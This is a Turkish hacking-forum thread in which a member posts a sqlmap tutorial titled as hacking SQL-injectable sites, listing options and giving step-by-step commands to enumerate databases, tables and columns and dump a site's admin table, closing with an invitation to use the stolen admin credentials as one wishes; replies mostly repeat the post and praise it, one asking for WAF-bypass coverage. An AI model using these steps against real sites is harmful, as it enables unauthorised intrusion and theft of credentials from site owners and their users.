Sqlmap Nedir | Nasıl kullanılır?

mitat1

Uzman üye
1 Eki 2022
1,075
753
SerasZen

Sqlmap Nedir?

Sqlmap açık kaynak kodlu sql injection açıklığı tespit ve kötüye kullanma
aracıdır.
Hedefe ulaşmak için kullanılan web sunucularını kullanan arşiv birimleri çeşitli sorgular/komutlar ile sistem üzerindeki sql enjeksiyon tipini tespit eder yine de içerdiğini kullandığına göre çeşitli bilgileri hedef koleksiyonlarından alır.

2-Sqlmap Verileri ve Parametreleri
d5lvguu.png

Veritabanı türü ve versiyonu (–banner,–all) Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs) Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns) Veritabanı datası(–dump, –dump-all) Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users) Veritabanı kullanıcısının parolası (–passwords) Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba) Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f) URL (–url, -r ) Burp suite ve WebScarp proxy logu (–log , -l) HTTP taleplerinin bir dosyadan okunulması (–r) Google üzerinden URL toplayıp input olarak alabilmek(-g) /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)

fzxt3ew.jpeg

3-Sql map ile sql açıklı site hackleme

(root)Terminal'i açın sql açıklı site bulduktan sonra sıra db cekmede Tekrardan terminale geçin ve aşağıdaki kodu terminale yazın. Bu kod sitedeki databaseleri bulmamıza yardımcı olucaktır
sqlmap -u açıklı site --dbs
mf3xqtc.JPG

Gelen [y/N] sorularına y yazarak enterliyoruz.

k9iqrhq.PNG

Şimdi Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.

sqlmap -u açıklısite -D database adı --table

Gördüğünüz gibi tablolar önümüze geldi Burda bizim yöneleceğimiz tablo "admin,user,superadmin" gibi tablolar olacak. Bu sitede "admin" tablosu olduğu için ben admin tablosunu kullanacağım. Aşağıdaki koddan tablo seçiyoruz ve columnlarını buluyoruz.
sqlmap -u açıklısite -D database adı -T admin --column

Colunumları gördük bunlar : id,identifiant,nom ve password. Şimdi bunları göstermeye gelelim ( admin şifresi id adı vs.) Kodu aşağıdaki gibi yazın.
sqlmap -u açıklısite -D database -T admin -C colunmlar --dump

NOT:BAZI KISIMLAR ALINTIDIR!!!

Admin Bilgileri elinizde dilediğiniz gibi kullanın,umarım faydalı olmuştur sağlıcakla kalın iyi günler

---YENİÇERİ Kulübü---

nw17pb1.jpeg

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28

Sqlmap Nedir?

aracıdır.
Hedefe ulaşmak için kullanılan web sunucularını kullanan arşiv birimleri çeşitli sorgular/komutlar ile sistem üzerindeki sql enjeksiyon tipini tespit eder yine de içerdiğini kullandığına göre çeşitli bilgileri hedef koleksiyonlarından alır.

d5lvguu.png

Veritabanı türü ve versiyonu (–banner,–all) Mevcut kullanılan veritabanı ve erişilebilen veritabanı isimleri (–current-db, –dbs) Veritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns) Veritabanı datası(–dump, –dump-all) Veritabanı mevcut kullanıcılar ve tüm kullanıcılar(–current-user,–users) Veritabanı kullanıcısının parolası (–passwords) Veritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba) Hedef sunucu hakkında bilgi(İşletim sistemi Uygulamanın kullanıldığı teknoloji vs. (-f) URL (–url, -r ) Burp suite ve WebScarp proxy logu (–log , -l) HTTP taleplerinin bir dosyadan okunulması (–r) Google üzerinden URL toplayıp input olarak alabilmek(-g) /sqlmap/sqlmap.conf dosyası -c parametresi ile verilerek tüm konfigrasyon input olarak verilebilir. (-c)

fzxt3ew.jpeg

(root)Terminal'i açın sql açıklı site bulduktan sonra sıra db cekmede Tekrardan terminale geçin ve aşağıdaki kodu terminale yazın. Bu kod sitedeki databaseleri bulmamıza yardımcı olucaktır
mf3xqtc.JPG

k9iqrhq.PNG

Şimdi Databasemizi seçip tablolarını çıkarmak için aşağıdaki kodumuzu terminale geçireceğiz.

Gördüğünüz gibi tablolar önümüze geldi Burda bizim yöneleceğimiz tablo "admin,user,superadmin" gibi tablolar olacak. Bu sitede "admin" tablosu olduğu için ben admin tablosunu kullanacağım. Aşağıdaki koddan tablo seçiyoruz ve columnlarını buluyoruz.

Colunumları gördük bunlar : id,identifiant,nom ve password. Şimdi bunları göstermeye gelelim ( admin şifresi id adı vs.) Kodu aşağıdaki gibi yazın.

Admin Bilgileri elinizde dilediğiniz gibi kullanın,umarım faydalı olmuştur sağlıcakla kalın iyi günler

---YENİÇERİ Kulübü---

nw17pb1.jpeg

Ellerinize saglik

'Box-Boy

Üye
18 Ağu 2007
137
191
iyi güzel hoş da sqlmap kullanımı konusunda daha iddaalı konular var bu 1, 2: gelen soruya neden "y" basıyoruz niçin basıyoruz yani bunları anlatsan ve bunları detaylandırsan daha hoş olur. 3: normal site yerine sqlmap de "post", "get" bunlar nasıl kullanılır ve bunların wafları bypassları tamper'ları vs. vs. gibi konulara parmak basarsan daha faydalı ve yararlı olacaktır.

Genede eline sağlık, ilerliyen zamanalar da bu tür konuları da bekleriz.

mf3xqtc.JPG

k9iqrhq.PNG

mitat1

Uzman üye
1 Eki 2022
1,075
753
SerasZen
iyi güzel hoş da sqlmap kullanımı konusunda daha iddaalı konular var bu 1, 2: gelen soruya neden "y" basıyoruz niçin basıyoruz yani bunları anlatsan ve bunları detaylandırsan daha hoş olur. 3: normal site yerine sqlmap de "post", "get" bunlar nasıl kullanılır ve bunların wafları bypassları tamper'ları vs. vs. gibi konulara parmak basarsan daha faydalı ve yararlı olacaktır.

Genede eline sağlık, ilerliyen zamanalar da bu tür konuları da bekleriz.
Ben öyle şeylere girseydim destan yazardım.cok daha iyisen sende konu ac gorelim

Sen daha uzununu yap

Muslukcu

Katılımcı Üye
17 Kas 2021
699
262
Tesisat dükkanı
Elini

Sqlmap Nedir?

aracıdır.

d5lvguu.png

fzxt3ew.jpeg

mf3xqtc.JPG

k9iqrhq.PNG

---YENİÇERİ Kulübü---

nw17pb1.jpeg

Elinize sağlık

'Anka

Basın&Medya Ekibi Kıdemli
8 Eyl 2021
3,325
2,509
Eline sağlık mitat. Gayet. Başarılı bir konu hem forum için hemde bu işlere yeni başlayanlar için gayet güzel. Eline koluna sağlık tekrardan devamını bekliyorum.

mitat1

Uzman üye
1 Eki 2022
1,075
753
SerasZen
Eline sağlık güzel olmuş.
Emeğinize sağlık.
elinize sağlık efenim 🤙👏
Eline sağlık güzel konu dostum.
elinize sağlık hocam
Emeğine Sağlık
Elini

Elinize sağlık
Eline sağlık resimler ve anlatım güzel biraz daha uzun olsa tadından yenmez bir konu
Sağolasın burdahakine dikkat ederim
Eline sağlık mitat. Gayet. Başarılı bir konu hem forum için hemde bu işlere yeni başlayanlar için gayet güzel. Eline koluna sağlık tekrardan devamını bekliyorum.
Teşekkürler

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.